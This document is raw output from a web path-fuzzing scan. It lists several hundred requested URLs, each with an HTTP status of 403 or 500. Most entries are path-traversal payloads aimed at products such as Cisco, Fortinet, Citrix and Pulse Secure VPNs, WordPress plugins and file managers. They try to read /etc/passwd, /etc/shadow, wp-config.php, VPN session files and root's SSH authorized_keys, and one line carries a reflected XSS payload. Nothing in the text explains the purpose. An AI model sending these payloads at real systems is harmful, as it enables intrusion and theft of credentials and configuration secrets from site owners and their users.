/%2e%2e//google.com   (Status: 403) [Size: 29]
/brokeradmin          (Status: 500) [Size: 71]
/META-INF             (Status: 500) [Size: 71]
/META-INF/application.xml (Status: 500) [Size: 71]
/META-INF/CERT.SF     (Status: 500) [Size: 71]
/META-INF/app-config.xml (Status: 500) [Size: 71]
/META-INF/application-client.xml (Status: 500) [Size: 71]
/meta_login/          (Status: 500) [Size: 71]
/META-INF/beans.xml   (Status: 500) [Size: 71]
/META-INF/container.xml (Status: 500) [Size: 71]
/META-INF/context.xml (Status: 500) [Size: 71]
/META-INF/ironjacamar.xml (Status: 500) [Size: 71]
/META-INF/jboss-app.xml (Status: 500) [Size: 71]
/META-INF/jboss-client.xml (Status: 500) [Size: 71]
/META-INF/ejb-jar.xml (Status: 500) [Size: 71]
/META-INF/eclipse.inf (Status: 500) [Size: 71]
/META-INF/jboss-deployment-structure.xml (Status: 500) [Size: 71]
/META-INF/openwebbeans/openwebbeans.properties (Status: 500) [Size: 71]
/META-INF/weblogic-application.xml (Status: 500) [Size: 71]
/META-INF/MANIFEST.MF (Status: 500) [Size: 71]
/META-INF/spring/application-context.xml (Status: 500) [Size: 71]
/META-INF/jbosscmp-jdbc.xml (Status: 500) [Size: 71]
/metaadmin            (Status: 500) [Size: 71]
/META-INF/jboss-ejb-client.xml (Status: 500) [Size: 71]
/META-INF/persistence.xml (Status: 500) [Size: 71]
/META-INF/weblogic-ejb-jar.xml (Status: 500) [Size: 71]
/META-INF/jboss-webservices.xml (Status: 500) [Size: 71]
/META-INF/jboss-ejb3.xml (Status: 500) [Size: 71]
/META-INF/ra.xml      (Status: 500) [Size: 71]
/META-INF/SOFTWARE.SF (Status: 500) [Size: 71]
/oauth/signin/        (Status: 500) [Size: 71]
/oauth/login/         (Status: 500) [Size: 71]
/oauth                (Status: 500) [Size: 71]
/url?para=//..//..//..//..//..//..//..//..//etc//passwd// (Status: 403) [Size: 29]
//+CSCOU+/../+CSCOE+/files/file_list.json (Status: 403) [Size: 29]
//gui/file_viewer.php?encrypt=N&target_folder=utilities&uploaded_filename=../../../../../../../etc/passwd (Status: 403) [Size: 29]
//server/logs/download?logType=error&logName=../../../../../../../../etc/shadow&logSource=engine (Status: 403) [Size: 29]
//wp—admin/admin—ajax.php?action=duplicator_download&file=/../wp-config.php (Status: 403) [Size: 29]
/modx/assets/cache/docid_1/../../../../../../../etc/passwd\0.pagecache.php (Status: 403) [Size: 29]
/api/v1/fs/..%2f..%2fetc/passwd (Status: 403) [Size: 29]
/metasploit-and-beef-the-tutorial-chinese.html (Status: 500) [Size: 71]
/meta.php             (Status: 500) [Size: 71]
/my_keys&dst=../../../root/.ssh/authorized_keys (Status: 403) [Size: 29]
/saml/lib/idp/saml2.php (Status: 500) [Size: 71]
/votes/../../admin/multiuser/multiuser.php (Status: 403) [Size: 29]
/signezui/playlist/edit/upload/../../../../../../../../../../etc/passwd (Status: 403) [Size: 29]
/meta/meta.php        (Status: 500) [Size: 71]
/nc-cms/system/../content/upload/phpspy2010.php (Status: 403) [Size: 29]
//index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd (Status: 403) [Size: 29]
//jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd (Status: 403) [Size: 29]
//jreport/sendfile/help/../bin/login.properties (Status: 403) [Size: 29]
//+CSCOU+/../+CSCOE+/files/file_list.json?path=/ (Status: 403) [Size: 29]
//./../../../../../../../../../../etc/shadow (Status: 403) [Size: 29]
//Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f&n=Common2 (Status: 403) [Size: 29]
//Admin/RoxyFileman/ProcessRequest?a=CREATEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2f&n=Common (Status: 403) [Size: 29]
//WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=../../../../../../../../etc/passwd (Status: 403) [Size: 29]
//_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected (Status: 403) [Size: 29]
//api/upload?action=filemgr&dirPath=%2f..%2f..%2fCustom%2fThemes%2fRCE_Test (Status: 403) [Size: 29]
//aptana/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd (Status: 403) [Size: 29]
//catalog.php?filename=../../../../../../../../../etc/passwd (Status: 403) [Size: 29]
//cd/../config/html/cnf_gi.htm (Status: 403) [Size: 29]
//cgi-bin/scripts/../../this_server/ServerManager.srv (Status: 403) [Size: 29]
//cgi-bin/shop.cgi/page=../../../filename.ext (Status: 403) [Size: 29]
//css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 403) [Size: 29]
//dUpro/Classifieds/../Pictures/default.asp (Status: 403) [Size: 29]
//dUpro/Classifieds/../Files/default.asp (Status: 403) [Size: 29]
//dUpro/Businesses/../Polls/default.asp (Status: 403) [Size: 29]
//dUpro/Classifieds/../Links/default.asp (Status: 403) [Size: 29]
//dUpro/Classifieds/../Pictures/detail.asp (Status: 403) [Size: 29]
//dUpro/Classifieds/../Events/default.asp (Status: 403) [Size: 29]
//dUpro/Businesses/../Pictures/default.asp (Status: 403) [Size: 29]
//dUpro/Businesses/../Topics/default.asp (Status: 403) [Size: 29]
//dUpro/Businesses/../Events/default.asp (Status: 403) [Size: 29]
//dUpro/Businesses/../events/default.asp (Status: 403) [Size: 29]
//dUpro/Classifieds/../Articles/default.asp (Status: 403) [Size: 29]
//dUpro/Businesses/../home/search.asp (Status: 403) [Size: 29]
//dUpro/Businesses/../Files/default.asp (Status: 403) [Size: 29]
//dUpro/Businesses/../Articles/default.asp (Status: 403) [Size: 29]
//dUpro/Businesses/../Businesses/default.asp (Status: 403) [Size: 29]
//dUpro/Classifieds/../Classifieds/default.asp (Status: 403) [Size: 29]
//dUpro/Businesses/../Products/default.asp (Status: 403) [Size: 29]
//dUpro/Classifieds/../Businesses/default.asp (Status: 403) [Size: 29]
//dUpro/Businesses/../polls/inc_vote.asp (Status: 403) [Size: 29]
//dUpro/Businesses/../polls/result.asp (Status: 403) [Size: 29]
//dUpro/Classifieds/../News/default.asp (Status: 403) [Size: 29]
//dUpro/Businesses/../Classifieds/default.asp (Status: 403) [Size: 29]
//dUpro/Classifieds/../Entertainments/default.asp (Status: 403) [Size: 29]
//dUpro/Businesses/../Links/default.asp (Status: 403) [Size: 29]
//dUpro/Businesses/../Entertainments/default.asp (Status: 403) [Size: 29]
//dUpro/Businesses/../Pictures/detail.asp (Status: 403) [Size: 29]
//dUpro/Classifieds/../Topics/default.asp (Status: 403) [Size: 29]
//dUpro/Events/../Classifieds/default.asp (Status: 403) [Size: 29]
//dUpro/Classifieds/../events/default.asp (Status: 403) [Size: 29]
//dUpro/Classifieds/../Polls/default.asp (Status: 403) [Size: 29]
//dUpro/Classifieds/../polls/inc_vote.asp (Status: 403) [Size: 29]
//dUpro/Events/../Businesses/default.asp (Status: 403) [Size: 29]
//dUpro/Classifieds/../Products/default.asp (Status: 403) [Size: 29]
//dUpro/Events/../Articles/default.asp (Status: 403) [Size: 29]
//dUpro/Files/../Articles/default.asp (Status: 403) [Size: 29]
//dUpro/Files/../Topics/default.asp (Status: 403) [Size: 29]
//dUpro/Files/../Links/default.asp (Status: 403) [Size: 29]
//dUpro/Events/../Links/default.asp (Status: 403) [Size: 29]
//dUpro/Files/../Files/default.asp (Status: 403) [Size: 29]
//dUpro/Events/../Entertainments/default.asp (Status: 403) [Size: 29]
//dUpro/Events/../Pictures/detail.asp (Status: 403) [Size: 29]
//dUpro/Files/../Products/default.asp (Status: 403) [Size: 29]
//dUpro/Events/../Products/default.asp (Status: 403) [Size: 29]
//dUpro/Files/../polls/result.asp (Status: 403) [Size: 29]
//dUpro/Events/../Topics/default.asp (Status: 403) [Size: 29]
//dUpro/Events/../events/detail.asp (Status: 403) [Size: 29]
//dUpro/Files/../Classifieds/default.asp (Status: 403) [Size: 29]
//dUpro/Events/../polls/inc_vote.asp (Status: 403) [Size: 29]
//dUpro/Events/../polls/result.asp (Status: 403) [Size: 29]
//dUpro/Files/../home/search.asp (Status: 403) [Size: 29]
//dUpro/Files/../Businesses/default.asp (Status: 403) [Size: 29]
//dUpro/Files/../Events/default.asp (Status: 403) [Size: 29]
//dUpro/Events/../events/default.asp (Status: 403) [Size: 29]
//dUpro/Events/../Pictures/default.asp (Status: 403) [Size: 29]
//dUpro/Files/../Pictures/default.asp (Status: 403) [Size: 29]
//dUpro/Files/../Pictures/detail.asp (Status: 403) [Size: 29]
//dUpro/Events/../News/default.asp (Status: 403) [Size: 29]
//dUpro/Files/../polls/inc_vote.asp (Status: 403) [Size: 29]
//dUpro/Files/../events/default.asp (Status: 403) [Size: 29]
//dUpro/Events/../Events/default.asp (Status: 403) [Size: 29]
//dUpro/Files/../Polls/default.asp (Status: 403) [Size: 29]
//dUpro/Events/../home/search.asp (Status: 403) [Size: 29]
//dUpro/Events/../Polls/default.asp (Status: 403) [Size: 29]
//dUpro/Events/../Files/default.asp (Status: 403) [Size: 29]
//dUpro/Files/../Entertainments/default.asp (Status: 403) [Size: 29]
//dUpro/Files/../News/default.asp (Status: 403) [Size: 29]
//dUpro/Classifieds/../polls/result.asp (Status: 403) [Size: 29]
//dUpro/Classifieds/../home/search.asp (Status: 403) [Size: 29]
//dUpro/Pictures/../Events/default.asp (Status: 403) [Size: 29]
//dUpro/Pictures/../Classifieds/default.asp (Status: 403) [Size: 29]
//dUpro/Pictures/../Files/default.asp (Status: 403) [Size: 29]
//dUpro/Pictures/../Articles/default.asp (Status: 403) [Size: 29]
//dUpro/Pictures/../Entertainments/default.asp (Status: 403) [Size: 29]
//dUpro/Pictures/../Links/default.asp (Status: 403) [Size: 29]
//dUpro/Pictures/../Businesses/default.asp (Status: 403) [Size: 29]
//dUpro/Pictures/../Pictures/detail.asp (Status: 403) [Size: 29]
//dUpro/Pictures/../News/default.asp (Status: 403) [Size: 29]
//dUpro/Pictures/../Pictures/default.asp (Status: 403) [Size: 29]
//dUpro/Pictures/../events/default.asp (Status: 403) [Size: 29]
//dUpro/Pictures/../Topics/default.asp (Status: 403) [Size: 29]
//dUpro/Pictures/../polls/inc_vote.asp (Status: 403) [Size: 29]
//dUpro/Topics/../Businesses/default.asp (Status: 403) [Size: 29]
//dUpro/Topics/../News/default.asp (Status: 403) [Size: 29]
//dUpro/Topics/../Events/default.asp (Status: 403) [Size: 29]
//dUpro/Topics/../Entertainments/default.asp (Status: 403) [Size: 29]
//dUpro/Topics/../Classifieds/default.asp (Status: 403) [Size: 29]
//dUpro/Topics/../Articles/default.asp (Status: 403) [Size: 29]
//dUpro/Topics/../Files/default.asp (Status: 403) [Size: 29]
//dUpro/Topics/../Pictures/default.asp (Status: 403) [Size: 29]
//dUpro/Pictures/../Products/default.asp (Status: 403) [Size: 29]
//dUpro/Pictures/../Polls/default.asp (Status: 403) [Size: 29]
//dUpro/Pictures/../home/search.asp (Status: 403) [Size: 29]
//dUpro/Pictures/../polls/result.asp (Status: 403) [Size: 29]
//dUpro/Topics/../Links/default.asp (Status: 403) [Size: 29]
//dUpro/Topics/../Topics/default.asp (Status: 403) [Size: 29]
//dUpro/events/../Articles/default.asp (Status: 403) [Size: 29]
//dUpro/Topics/../Products/default.asp (Status: 403) [Size: 29]
//dUpro/Topics/../polls/result.asp (Status: 403) [Size: 29]
//dUpro/Topics/../home/search.asp (Status: 403) [Size: 29]
//dUpro/events/../Events/default.asp (Status: 403) [Size: 29]
//dUpro/Topics/../topics/detail.asp (Status: 403) [Size: 29]
//dUpro/Topics/../topics/default.asp (Status: 403) [Size: 29]
//dUpro/Topics/../Polls/default.asp (Status: 403) [Size: 29]
//dUpro/events/../Classifieds/default.asp (Status: 403) [Size: 29]
//dUpro/events/../Links/default.asp (Status: 403) [Size: 29]
//dUpro/events/../Businesses/default.asp (Status: 403) [Size: 29]
//dUpro/Topics/../topics/cat.asp (Status: 403) [Size: 29]
//dUpro/events/../Pictures/default.asp (Status: 403) [Size: 29]
//dUpro/events/../Files/default.asp (Status: 403) [Size: 29]
//dUpro/events/../Entertainments/default.asp (Status: 403) [Size: 29]
//dUpro/events/../News/default.asp (Status: 403) [Size: 29]
//dUpro/Topics/../polls/inc_vote.asp (Status: 403) [Size: 29]
//dUpro/events/../Polls/default.asp (Status: 403) [Size: 29]
//dUpro/events/../Products/default.asp (Status: 403) [Size: 29]
//dUpro/events/../Pictures/detail.asp (Status: 403) [Size: 29]
//dUpro/events/../events/default.asp (Status: 403) [Size: 29]
//dUpro/events/../polls/result.asp (Status: 403) [Size: 29]
//dUpro/events/../polls/inc_vote.asp (Status: 403) [Size: 29]
//dUpro/events/../events/detail.asp (Status: 403) [Size: 29]
//dUpro/events/../home/search.asp (Status: 403) [Size: 29]
//dUpro/events/../Topics/default.asp (Status: 403) [Size: 29]
//dUpro/home/../Articles/default.asp (Status: 403) [Size: 29]
//dUpro/home/../Articles/cat.asp (Status: 403) [Size: 29]
//dUpro/home/../Links/cat.asp (Status: 403) [Size: 29]
//dUpro/home/../Files/default.asp (Status: 403) [Size: 29]
//dUpro/home/../Links/detail.asp (Status: 403) [Size: 29]
//dUpro/home/../Classifieds/detail.asp (Status: 403) [Size: 29]
//dUpro/home/../Businesses/default.asp (Status: 403) [Size: 29]
//dUpro/home/../Events/default.asp (Status: 403) [Size: 29]
//dUpro/home/../Files/detail.asp (Status: 403) [Size: 29]
//dUpro/home/../Businesses/detail.asp (Status: 403) [Size: 29]
//dUpro/home/../Entertainments/default.asp (Status: 403) [Size: 29]
//dUpro/home/../Files/cat.asp (Status: 403) [Size: 29]
//dUpro/home/../Articles/detail.asp (Status: 403) [Size: 29]
//dUpro/home/../Classifieds/default.asp (Status: 403) [Size: 29]
//dUpro/home/../Entertainments/cat.asp (Status: 403) [Size: 29]
//dUpro/home/../Entertainments/detail.asp (Status: 403) [Size: 29]
//dUpro/home/../Links/default.asp (Status: 403) [Size: 29]
//dUpro/home/../Events/detail.asp (Status: 403) [Size: 29]
//dUpro/home/../Events/cat.asp (Status: 403) [Size: 29]
//dUpro/home/../Businesses/cat.asp (Status: 403) [Size: 29]
//dUpro/home/../Classifieds/cat.asp (Status: 403) [Size: 29]
//dUpro/home/../polls/result.asp (Status: 403) [Size: 29]
//dUpro/home/../news/detail.asp (Status: 403) [Size: 29]
//dUpro/home/../Products/cat.asp (Status: 403) [Size: 29]
//dUpro/home/../polls/inc_vote.asp (Status: 403) [Size: 29]
//dUpro/home/../Polls/default.asp (Status: 403) [Size: 29]
//dUpro/home/../home/search.asp (Status: 403) [Size: 29]
//dUpro/home/../News/detail.asp (Status: 403) [Size: 29]
//dUpro/home/../News/cat.asp (Status: 403) [Size: 29]
//dUpro/home/../Topics/default.asp (Status: 403) [Size: 29]
//dUpro/home/../events/default.asp (Status: 403) [Size: 29]
//dUpro/home/../News/default.asp (Status: 403) [Size: 29]
//dUpro/home/../Pictures/detail.asp (Status: 403) [Size: 29]
//dUpro/home/../Topics/cat.asp (Status: 403) [Size: 29]
//dUpro/home/../Products/detail.asp (Status: 403) [Size: 29]
//dUpro/home/../Pictures/cat.asp (Status: 403) [Size: 29]
//dUpro/home/../Topics/detail.asp (Status: 403) [Size: 29]
//dUpro/home/../Pictures/default.asp (Status: 403) [Size: 29]
//dUpro/home/../Products/default.asp (Status: 403) [Size: 29]
//dUpro/polls/../polls/../Businesses/default.asp (Status: 403) [Size: 29]
//dUpro/polls/../polls/../Classifieds/default.asp (Status: 403) [Size: 29]
//dUpro/polls/../polls/../Articles/default.asp (Status: 403) [Size: 29]
//dUpro/polls/../polls/../Entertainments/default.asp (Status: 403) [Size: 29]
//dUpro/polls/../polls/../Pictures/default.asp (Status: 403) [Size: 29]
//dUpro/polls/../polls/../Events/default.asp (Status: 403) [Size: 29]
//dUpro/polls/../polls/../Links/default.asp (Status: 403) [Size: 29]
//dUpro/polls/../polls/../Pictures/detail.asp (Status: 403) [Size: 29]
//dUpro/polls/../polls/../News/default.asp (Status: 403) [Size: 29]
//dUpro/polls/../polls/../Files/default.asp (Status: 403) [Size: 29]
//dUpro/polls/../polls/../Topics/default.asp (Status: 403) [Size: 29]
//dUpro/polls/../polls/../Polls/default.asp (Status: 403) [Size: 29]
//dUpro/polls/../polls/../Products/default.asp (Status: 403) [Size: 29]
//dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ (Status: 403) [Size: 29]
//dUpro/polls/../polls/../home/search.asp (Status: 403) [Size: 29]
//dUpro/polls/../polls/../polls/result.asp (Status: 403) [Size: 29]
//dUpro/polls/../polls/../polls/inc_vote.asp (Status: 403) [Size: 29]
//dUpro/polls/../polls/../events/default.asp (Status: 403) [Size: 29]
//dUpro/polls/../polls/default.asp (Status: 403) [Size: 29]
//demantra/common/loginCheck.jsp/../../GraphServlet (Status: 403) [Size: 29]
//gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts (Status: 403) [Size: 29]
//home.asp/home.asp/../menu.asp (Status: 403) [Size: 29]
//index.php?m=admin&c=custom&a=themeexporthandle&theme_name=../../../etc/passwd (Status: 403) [Size: 29]
//js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 403) [Size: 29]
//kmrs/exportmanager/ajax/getfiles?f=/../../../../../../../../../../proc/version (Status: 403) [Size: 29]
//laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd (Status: 403) [Size: 29]
//lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 403) [Size: 29]
//oscommerce_installation/default.php/cPath/../../ (Status: 403) [Size: 29]
//remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession (Status: 403) [Size: 29]
//res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 403) [Size: 29]
//servlet/ssifilter/../../filename (Status: 403) [Size: 29]
//test_DUportal/home/../home/channel.asp (Status: 403) [Size: 29]
//torrential/dox/getdox.php/../forums.php (Status: 403) [Size: 29]
//torrential/dox/getdox.php/../../index.html (Status: 403) [Size: 29]
//torrential/dox/getdox.php/../index.html (Status: 403) [Size: 29]
//vpn/../vpns/cfg/smb.conf (Status: 403) [Size: 29]
//vpn/../vpns/portal/scripts/newbm.pl (Status: 403) [Size: 29]
//webpages/data/_._.<img src=a onerror=alert(“Reflected-XSS”)>../..%2f (Status: 403) [Size: 29]
//wp-admin/admin-ajax.php?action=../../../../../index.php (Status: 403) [Size: 29]
//wp-admin/admin-ajax.php?action=/../../../../../../index (Status: 403) [Size: 29]
//wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd (Status: 403) [Size: 29]
//wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd (Status: 403) [Size: 29]
//xyz/../../ThinVnc.ini (Status: 403) [Size: 29]
//olt/Login.do/../../olt/UploadFileUpload.do (Status: 403) [Size: 29]
//setup/setup-/../../plugin-admin.jsp (Status: 403) [Size: 29]
//../agc/bp.pl        (Status: 403) [Size: 29]
//spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log (Status: 403) [Size: 29]
//demantra/common/loginCheck.jsp/../../ServerDetailsServlet (Status: 403) [Size: 29]
//vpn/../vpns/portal/scripts/newbm.pl (Status: 403) [Size: 29]
